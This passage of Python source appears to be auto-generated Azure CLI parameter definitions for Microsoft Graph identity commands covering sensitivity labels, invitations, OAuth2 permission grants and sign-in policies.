with self.argument_context('identitysignins information-protection-policy-label evaluate-application') as c:
c.argument('assignment_method', arg_type=get_enum_type(['standard', 'privileged', 'auto']), help='',
arg_group='Labeling Options')
c.argument('downgrade_justification', action=AddDowngradeJustification, nargs='+',
help='downgradeJustification', arg_group='Labeling Options')
c.argument('extended_properties', action=AddExtendedProperties, nargs='+', help='', arg_group='Labeling '
'Options')
c.argument('label_id', help='', arg_group='Labeling Options')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label evaluate-classification-result') as c:
c.argument('classification_results', action=AddClassificationResults, nargs='+', help='')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label evaluate-removal') as c:
c.argument('downgrade_justification', action=AddDowngradeJustification, nargs='+',
help='downgradeJustification')
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-policy-label extract-label') as c:
c.argument('format_', options_list=['--format'], arg_type=get_enum_type(['default', 'email']), help='',
arg_group='Content Info')
c.argument('identifier', type=str, help='', arg_group='Content Info')
c.argument('metadata', action=AddMetadata, nargs='+', help='', arg_group='Content Info')
c.argument('state', arg_type=get_enum_type(['rest', 'motion', 'use']), help='', arg_group='Content Info')
with self.argument_context('identitysignins information-protection-sensitivity-label create-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection-sensitivity-label delete-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-sensitivity-label evaluate') as c:
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel')
with self.argument_context('identitysignins information-protection-sensitivity-label list-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-sensitivity-label show-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-sensitivity-label update-sublabel') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('sensitivity_label_id1', type=str, help='key: id of sensitivityLabel')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('applicable_to', arg_type=get_enum_type(['email', 'site', 'unifiedGroup', 'unknownFutureValue']),
help='')
c.argument('application_mode', arg_type=get_enum_type(['manual', 'automatic', 'recommended']), help='')
c.argument('assigned_policies', action=AddAssignedPolicies, nargs='+', help='')
c.argument('auto_labeling', action=AddAutoLabeling, nargs='+', help='autoLabeling')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='')
c.argument('is_default', arg_type=get_three_state_flag(), help='')
c.argument('is_endpoint_protection_enabled', arg_type=get_three_state_flag(), help='')
c.argument('label_actions', action=AddLabelActions, nargs='+', help='')
c.argument('name', type=str, help='')
c.argument('priority', type=int, help='')
c.argument('tool_tip', type=str, help='')
c.argument('sublabels', type=validate_file_or_dict, help=' Expected value: json-string/@json-file.')
with self.argument_context('identitysignins information-protection-sensitivity-label-sublabel evaluate') as c:
c.argument('sensitivity_label_id', type=str, help='key: id of sensitivityLabel')
c.argument('discovered_sensitive_types', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('current_label', action=AddCurrentLabel, nargs='+', help='currentLabel')
with self.argument_context('identitysignins information-protection-threat-assessment-request create-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('message', type=str, help='The result message for each threat assessment.')
c.argument('result_type', arg_type=get_enum_type(['checkPolicy', 'rescan', 'unknownFutureValue']), help='')
with self.argument_context('identitysignins information-protection-threat-assessment-request delete-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins information-protection-threat-assessment-request list-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-threat-assessment-request show-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins information-protection-threat-assessment-request update-result') as c:
c.argument('threat_assessment_request_id', type=str, help='key: id of threatAssessmentRequest')
c.argument('threat_assessment_result_id', type=str, help='key: id of threatAssessmentResult')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'.')
c.argument('message', type=str, help='The result message for each threat assessment.')
c.argument('result_type', arg_type=get_enum_type(['checkPolicy', 'rescan', 'unknownFutureValue']), help='')
with self.argument_context('identitysignins invitation-invitation create-invitation') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('invited_user_display_name', type=str, help='The display name of the user being invited.')
c.argument('invited_user_email_address', type=str, help='The email address of the user being invited. '
'Required. The following special characters are not permitted in the email address:Tilde '
'(~)Exclamation point (!)Number sign (#)Dollar sign ($)Percent (%)Circumflex (^)Ampersand '
'(&)Asterisk (*)Parentheses (( ))Plus sign (+)Equal sign (=)Brackets ([ ])Braces ({ })Backslash '
'(/)Slash mark (/)Pipe (/|)Semicolon (;)Colon (:)Quotation marks (\')Angle brackets (< >)Question '
'mark (?)Comma (,)However, the following exceptions apply:A period (.) or a hyphen (-) is permitted '
'anywhere in the user name, except at the beginning or end of the name.An underscore (_) is '
'permitted anywhere in the user name. This includes at the beginning or end of the name.')
c.argument('invited_user_type', type=str, help='The userType of the user being invited. By default, this is '
'Guest. You can invite as Member if you are a company administrator.')
c.argument('invite_redeem_url', type=str,
help='The URL the user can use to redeem their invitation. Read-only')
c.argument('invite_redirect_url', type=str, help='The URL the user should be redirected to once the invitation '
'is redeemed. Required.')
c.argument('reset_redemption', arg_type=get_three_state_flag(), help='')
c.argument('send_invitation_message', arg_type=get_three_state_flag(), help='Indicates whether an email should '
'be sent to the user being invited or not. The default is false.')
c.argument('status', type=str, help='The status of the invitation. Possible values: PendingAcceptance, '
'Completed, InProgress, and Error')
c.argument('invited_user', type=validate_file_or_dict, help='Represents an Azure Active Directory user object. '
'Expected value: json-string/@json-file.')
c.argument('cc_recipients', type=validate_file_or_dict, help='Additional recipients the invitation message '
'should be sent to. Currently only 1 additional recipient is supported. Expected value: '
'json-string/@json-file.', arg_group='Invited User Message Info')
c.argument('customized_message_body', type=str, help='Customized message body you want to send if you don\'t '
'want the default message.', arg_group='Invited User Message Info')
c.argument('message_language', type=str, help='The language you want to send the default message in. If the '
'customizedMessageBody is specified, this property is ignored, and the message is sent using the '
'customizedMessageBody. The language format should be in ISO 639. The default is en-US.',
arg_group='Invited User Message Info')
with self.argument_context('identitysignins invitation-invitation delete-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins invitation-invitation list-invitation') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation-invitation show-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation-invitation update-invitation') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('invited_user_display_name', type=str, help='The display name of the user being invited.')
c.argument('invited_user_email_address', type=str, help='The email address of the user being invited. '
'Required. The following special characters are not permitted in the email address:Tilde '
'(~)Exclamation point (!)Number sign (#)Dollar sign ($)Percent (%)Circumflex (^)Ampersand '
'(&)Asterisk (*)Parentheses (( ))Plus sign (+)Equal sign (=)Brackets ([ ])Braces ({ })Backslash '
'(/)Slash mark (/)Pipe (/|)Semicolon (;)Colon (:)Quotation marks (\')Angle brackets (< >)Question '
'mark (?)Comma (,)However, the following exceptions apply:A period (.) or a hyphen (-) is permitted '
'anywhere in the user name, except at the beginning or end of the name.An underscore (_) is '
'permitted anywhere in the user name. This includes at the beginning or end of the name.')
c.argument('invited_user_type', type=str, help='The userType of the user being invited. By default, this is '
'Guest. You can invite as Member if you are a company administrator.')
c.argument('invite_redeem_url', type=str,
help='The URL the user can use to redeem their invitation. Read-only')
c.argument('invite_redirect_url', type=str, help='The URL the user should be redirected to once the invitation '
'is redeemed. Required.')
c.argument('reset_redemption', arg_type=get_three_state_flag(), help='')
c.argument('send_invitation_message', arg_type=get_three_state_flag(), help='Indicates whether an email should '
'be sent to the user being invited or not. The default is false.')
c.argument('status', type=str, help='The status of the invitation. Possible values: PendingAcceptance, '
'Completed, InProgress, and Error')
c.argument('invited_user', type=validate_file_or_dict, help='Represents an Azure Active Directory user object. '
'Expected value: json-string/@json-file.')
c.argument('cc_recipients', type=validate_file_or_dict, help='Additional recipients the invitation message '
'should be sent to. Currently only 1 additional recipient is supported. Expected value: '
'json-string/@json-file.', arg_group='Invited User Message Info')
c.argument('customized_message_body', type=str, help='Customized message body you want to send if you don\'t '
'want the default message.', arg_group='Invited User Message Info')
c.argument('message_language', type=str, help='The language you want to send the default message in. If the '
'customizedMessageBody is specified, this property is ignored, and the message is sent using the '
'customizedMessageBody. The language format should be in ISO 639. The default is en-US.',
arg_group='Invited User Message Info')
with self.argument_context('identitysignins invitation delete-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins invitation set-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('body', type=validate_file_or_dict, help='New navigation property ref values Expected value: '
'json-string/@json-file.')
with self.argument_context('identitysignins invitation show-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins invitation show-ref-invited-user') as c:
c.argument('invitation_id', type=str, help='key: id of invitation')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant create-o-auth2-permission-grant') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='The id of the client service principal for the application which is '
'authorized to act on behalf of a signed-in user when accessing an API. Required. Supports $filter '
'(eq only).')
c.argument('consent_type', type=str, help='Indicates if authorization is granted for the client application to '
'impersonate all users or only a specific user. AllPrincipals indicates authorization to '
'impersonate all users. Principal indicates authorization to impersonate a specific user. Consent '
'on behalf of all users can be granted by an administrator. Non-admin users may be authorized to '
'consent on behalf of themselves in some cases, for some delegated permissions. Required. Supports '
'$filter (eq only).')
c.argument('expiry_time', help='')
c.argument('principal_id', type=str, help='The id of the user on behalf of whom the client is authorized to '
'access the resource, when consentType is Principal. If consentType is AllPrincipals this value is '
'null. Required when consentType is Principal.')
c.argument('resource_id', type=str, help='The id of the resource service principal to which access is '
'authorized. This identifies the API which the client is authorized to attempt to call on behalf of '
'a signed-in user.')
c.argument('scope', type=str, help='A space-separated list of the claim values for delegated permissions which '
'should be included in access tokens for the resource application (the API). For example, openid '
'User.Read GroupMember.Read.All. Each claim value should match the value field of one of the '
'delegated permissions defined by the API, listed in the publishedPermissionScopes property of the '
'resource service principal.')
c.argument('start_time', help='')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant delete-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant list-o-auth2-permission-grant') as c:
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant show-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins oauth2-permission-grant-o-auth2-permission-grant update-o-auth2-permission-grant') as c:
c.argument('o_auth2_permission_grant_id', type=str, help='key: id of oAuth2PermissionGrant')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('client_id', type=str, help='The id of the client service principal for the application which is '
'authorized to act on behalf of a signed-in user when accessing an API. Required. Supports $filter '
'(eq only).')
c.argument('consent_type', type=str, help='Indicates if authorization is granted for the client application to '
'impersonate all users or only a specific user. AllPrincipals indicates authorization to '
'impersonate all users. Principal indicates authorization to impersonate a specific user. Consent '
'on behalf of all users can be granted by an administrator. Non-admin users may be authorized to '
'consent on behalf of themselves in some cases, for some delegated permissions. Required. Supports '
'$filter (eq only).')
c.argument('expiry_time', help='')
c.argument('principal_id', type=str, help='The id of the user on behalf of whom the client is authorized to '
'access the resource, when consentType is Principal. If consentType is AllPrincipals this value is '
'null. Required when consentType is Principal.')
c.argument('resource_id', type=str, help='The id of the resource service principal to which access is '
'authorized. This identifies the API which the client is authorized to attempt to call on behalf of '
'a signed-in user.')
c.argument('scope', type=str, help='A space-separated list of the claim values for delegated permissions which '
'should be included in access tokens for the resource application (the API). For example, openid '
'User.Read GroupMember.Read.All. Each claim value should match the value field of one of the '
'delegated permissions defined by the API, listed in the publishedPermissionScopes property of the '
'resource service principal.')
c.argument('start_time', help='')
with self.argument_context('identitysignins organization create-ref-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('body', type=validate_file_or_dict, help='New navigation property ref value Expected value: '
'json-string/@json-file.')
with self.argument_context('identitysignins organization list-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins organization list-ref-certificate-based-auth-configuration') as c:
c.argument('organization_id', type=str, help='key: id of organization')
c.argument('orderby', nargs='+', help='Order items by property values')
with self.argument_context('identitysignins policy-policy-root show-policy-root') as c:
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('identitysignins policy-policy-root update-policy-root') as c:
c.argument('b2_c_authentication_methods_policy', action=AddB2CAuthenticationMethodsPolicy, nargs='+',
help='b2cAuthenticationMethodsPolicy')
c.argument('activity_based_timeout_policies', action=AddActivityBasedTimeoutPolicies, nargs='+', help='')
c.argument('authorization_policy', type=validate_file_or_dict,
help=' Expected value: json-string/@json-file.')
c.argument('claims_mapping_policies', action=AddClaimsMappingPolicies, nargs='+', help='')
c.argument('home_realm_discovery_policies', action=AddHomeRealmDiscoveryPolicies, nargs='+', help='')
c.argument('permission_grant_policies', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('private_link_resource_policies', action=AddPrivateLinkResourcePolicies, nargs='+', help='')
c.argument('token_issuance_policies', action=AddTokenIssuancePolicies, nargs='+', help='')
c.argument('token_lifetime_policies', action=AddTokenLifetimePolicies, nargs='+', help='')
c.argument('conditional_access_policies', type=validate_file_or_dict, help=' Expected value: '
'json-string/@json-file.')
c.argument('identity_security_defaults_enforcement_policy',
action=AddIdentitySecurityDefaultsEnforcementPolicy, nargs='+', help='Represents an Azure Active '
'Directory object. The directoryObject type is the base type for many other directory entity types.')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.', arg_group='Directory Role Access Review '
'Policy')
c.argument('apply_actions', action=AddApplyActions, nargs='+', help=' Expect value: KEY1=VALUE1 KEY2=VALUE2 '
'...', arg_group='Directory Role Access Review Policy Settings')
c.argument('auto_apply_decisions_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('default_decision', type=str, help='', arg_group='Directory Role Access Review Policy Settings')
c.argument('default_decision_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('instance_duration_in_days', type=int, help='', arg_group='Directory Role Access Review Policy '
'Settings')
c.argument('justification_required_on_approval', arg_type=get_three_state_flag(), help='',
arg_group='Directory Role Access Review Policy Settings')
c.argument('mail_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('recommendations_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory Role '
'Access Review Policy Settings')
c.argument('recurrence', type=validate_file_or_dict, help='patternedRecurrence Expected value: '
'json-string/@json-file.', arg_group='Directory Role Access Review Policy Settings')
c.argument('reminder_notifications_enabled', arg_type=get_three_state_flag(), help='', arg_group='Directory '
'Role Access Review Policy Settings')
c.argument('microsoft_graph_entity_id', type=str, help='Read-only.', arg_group='Admin Consent Request Policy')
c.argument('admin_consent_request_policy_is_enabled', arg_type=get_three_state_flag(), help='',
arg_group='Admin Consent Request Policy')
c.argument('notify_reviewers', arg_type=get_three_state_flag(), help='', arg_group='Admin Consent Request '
'Policy')
c.argument('reminders_enabled', arg_type=get_three_state_flag(), help='', arg_group='Admin Consent Request '
'Policy')
c.argument('request_duration_in_days', type=int, help='', arg_group='Admin Consent Request Policy')
c.argument('reviewers', action=AddReviewers, nargs='+', help='', arg_group='Admin Consent Request Policy')
c.argument('version', type=int, help='', arg_group='Admin Consent Request Policy')
c.argument('id1', type=str, help='Read-only.', arg_group='Device Registration Policy')
c.argument('id2', type=str, help='Read-only.', arg_group='Authentication Flows Policy')
c.argument('description', type=str, help='', arg_group='Authentication Flows Policy')
c.argument('display_name', type=str, help='', arg_group='Authentication Flows Policy')
c.argument('is_enabled', arg_type=get_three_state_flag(), help='', arg_group='Authentication Flows Policy Self '
'Service Sign Up')
with self.argument_context('identitysignins policy create-activity-based-timeout-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-authorization-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('allowed_to_sign_up_email_based_subscriptions', arg_type=get_three_state_flag(), help='')
c.argument('allowed_to_use_sspr', arg_type=get_three_state_flag(), help='')
c.argument('allow_email_verified_users_to_join_organization', arg_type=get_three_state_flag(), help='')
c.argument('allow_invites_from', arg_type=get_enum_type(['none', 'adminsAndGuestInviters',
'adminsGuestInvitersAndAllMembers', 'everyone',
'unknownFutureValue']), help='')
c.argument('block_msol_power_shell', arg_type=get_three_state_flag(), help='')
c.argument('default_user_role_permissions', action=AddDefaultUserRolePermissions, nargs='+',
help='defaultUserRolePermissions')
c.argument('enabled_preview_features', nargs='+', help='')
c.argument('guest_user_role_id', help='')
c.argument('permission_grant_policy_ids_assigned_to_default_user_role', nargs='+', help='')
with self.argument_context('identitysignins policy create-claim-mapping-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-conditional-access-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('description', type=str, help='')
c.argument('display_name', type=str, help='Specifies a display name for the conditionalAccessPolicy object.')
c.argument('grant_controls', action=AddGrantControls, nargs='+', help='conditionalAccessGrantControls')
c.argument('modified_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'. Readonly.')
c.argument('state', arg_type=get_enum_type(['enabled', 'disabled', 'enabledForReportingButNotEnforced']),
help='')
c.argument('application_enforced_restrictions', action=AddApplicationEnforcedRestrictions, nargs='+',
help='applicationEnforcedRestrictionsSessionControl', arg_group='Session Controls')
c.argument('cloud_app_security', action=AddCloudAppSecurity, nargs='+', help='cloudAppSecuritySessionControl',
arg_group='Session Controls')
c.argument('persistent_browser', action=AddPersistentBrowser, nargs='+',
help='persistentBrowserSessionControl', arg_group='Session Controls')
c.argument('sign_in_frequency', action=AddSignInFrequency, nargs='+', help='signInFrequencySessionControl',
arg_group='Session Controls')
c.argument('applications', action=AddApplications, nargs='+', help='conditionalAccessApplications',
arg_group='Conditions')
c.argument('client_applications', action=AddClientApplications, nargs='+',
help='conditionalAccessClientApplications', arg_group='Conditions')
c.argument('client_app_types', nargs='+', help='Client application types included in the policy. Possible '
'values are: all, browser, mobileAppsAndDesktopClients, exchangeActiveSync, easSupported, other.',
arg_group='Conditions')
c.argument('devices', action=AddDevices, nargs='+', help='conditionalAccessDevices', arg_group='Conditions')
c.argument('device_states', action=AddDeviceStates, nargs='+', help='conditionalAccessDeviceStates',
arg_group='Conditions')
c.argument('locations', action=AddLocations, nargs='+', help='conditionalAccessLocations',
arg_group='Conditions')
c.argument('platforms', action=AddPlatforms, nargs='+', help='conditionalAccessPlatforms',
arg_group='Conditions')
c.argument('sign_in_risk_levels', nargs='+', help='Risk levels included in the policy. Possible values are: '
'low, medium, high, none.', arg_group='Conditions')
c.argument('user_risk_levels', nargs='+', help='', arg_group='Conditions')
c.argument('users', action=AddUsers, nargs='+', help='conditionalAccessUsers', arg_group='Conditions')
with self.argument_context('identitysignins policy create-home-realm-discovery-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-permission-grant-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('excludes', action=AddExcludes, nargs='+', help='')
c.argument('includes', action=AddIncludes, nargs='+', help='')
with self.argument_context('identitysignins policy create-private-link-resource-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('allowed_tenant_ids', nargs='+', help='')
c.argument('arm_resource_id', type=str, help='')
with self.argument_context('identitysignins policy create-token-issuance-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy create-token-lifetime-policy') as c:
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('deleted_date_time', help='')
c.argument('description', type=str, help='Description for this policy.')
c.argument('display_name', type=str, help='Display name for this policy.')
c.argument('definition', nargs='+', help='A string collection containing a JSON string that defines the rules '
'and settings for a policy. The syntax for the definition differs for each derived policy type. '
'Required.')
c.argument('is_organization_default', arg_type=get_three_state_flag(), help='If set to true, activates this '
'policy. There can be many policies for the same policy type, but only one can be activated as the '
'organization default. Optional, default value is false.')
c.argument('applies_to', action=AddAppliesTo, nargs='+', help='')
with self.argument_context('identitysignins policy delete-activity-based-timeout-policy') as c:
c.argument('activity_based_timeout_policy_id', type=str, help='key: id of activityBasedTimeoutPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-admin-consent-request-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-authentication-flow-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-authorization-policy') as c:
c.argument('authorization_policy_id', type=str, help='key: id of authorizationPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-b2-c-authentication-method-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-claim-mapping-policy') as c:
c.argument('claims_mapping_policy_id', type=str, help='key: id of claimsMappingPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-conditional-access-policy') as c:
c.argument('conditional_access_policy_id', type=str, help='key: id of conditionalAccessPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-device-registration-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-directory-role-access-review-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-home-realm-discovery-policy') as c:
c.argument('home_realm_discovery_policy_id', type=str, help='key: id of homeRealmDiscoveryPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-identity-security-default-enforcement-policy') as c:
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-permission-grant-policy') as c:
c.argument('permission_grant_policy_id', type=str, help='key: id of permissionGrantPolicy')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-private-link-resource-policy') as c:
c.argument('private_link_resource_id', type=str, help='key: id of privateLinkResource')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('identitysignins policy delete-token-issuance-policy') as c:
c.argument('token_issuance_policy_id', type=str, help='key: id of tokenIssuancePolicy')
c.argument('if_match', type=str, help='ETag')
